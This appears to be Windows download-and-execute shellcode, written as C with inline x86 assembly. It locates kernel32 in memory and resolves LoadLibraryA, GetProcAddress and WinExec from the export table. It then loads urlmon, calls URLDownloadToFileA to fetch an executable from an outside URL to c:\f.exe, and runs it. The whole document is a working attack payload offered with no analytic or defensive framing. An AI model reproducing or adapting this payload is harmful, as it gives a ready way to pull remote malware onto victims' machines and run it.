// my vars.. // /20 /30 //35 //3b char *string = "\x2c\x20\x35\x0eGetProcAddress\0\x0cLoadLibraryA\0\x07WinExec\0\0\0\x3burlmon.dll\0URLDownloadToFileA\0c:\\f.exe\0http://www.tribalstorm.com/n.exe"; __asm { // u will need a slider.. // edx needs to be set to string.. mov edx, string call jumppoint jumppoint: mov ebx,77F00000h // we search for some stuff in kernel32.dll loop2: cmp dword ptr [ebx],905A4Dh je jump3 dec ebx jmp loop2 jump3: // we've found the stuff and copy some data // func 1 mov esi,dword ptr [ebx+3Ch] add esi,ebx // func 2 mov esi,dword ptr [esi+78h] add esi,ebx // func 3 mov edi,dword ptr [esi+20h] add edi,ebx // func 4 mov ecx,dword ptr [esi+14h] push esi // 77ED3630 xor eax,eax add edx, 0x3 loopseh: push edi // 77ED4340 push ecx // 0000033A // loop seh list mov edi,dword ptr [edi] add edi,ebx // ebx = 77E80000 //lea esi, mov esi,edx // edx = 00422FDC add esi, 1 // we've loaded all we need cmp byte ptr [esi], 0x00 je startexecute xor ecx,ecx // we load functions and their addresses from the v table mov cl, byte ptr [edx] repe cmps byte ptr [esi],byte ptr [edi] pop ecx pop edi je readseh add edi,4 inc eax loop loopseh readseh: nop inc esi mov edx, esi // store where are in the string pop esi push edx // n push edi push ebx push eax mov edx,dword ptr [esi+24h] add edx,ebx shl eax,1 add eax,edx xor ecx,ecx mov cx,word ptr [eax] mov eax,dword ptr [esi+1Ch] add eax,ebx shl ecx,2 add eax,ecx mov edx,dword ptr [eax] add edx,ebx pop eax pop ebx pop edi pop ecx mov [ecx-0x4], edx mov edx, ecx push esi jmp loopseh startexecute: nop add ecx, 2 mov esi, ecx // loadlibrary urlmon lea eax, [ecx+1h] push eax mov ebx, dword ptr [ecx-0x0f] call ebx // eax = handle to urlmon mov dword ptr[esi-0x0f], eax nop lea edx, [esi+0x0c] push edx push [esi-0x0f] mov ebx, dword ptr [esi-0x1d] call ebx // elvis found the address :> push 0 push 0 lea ebx, [esi+0x1f] push ebx lea ebx, [esi+0x28] push ebx push 0 call eax nop // sven has the file.. push 1 lea ebx, [esi+0x1f] push ebx call [esi-0x06] nop // Game Over..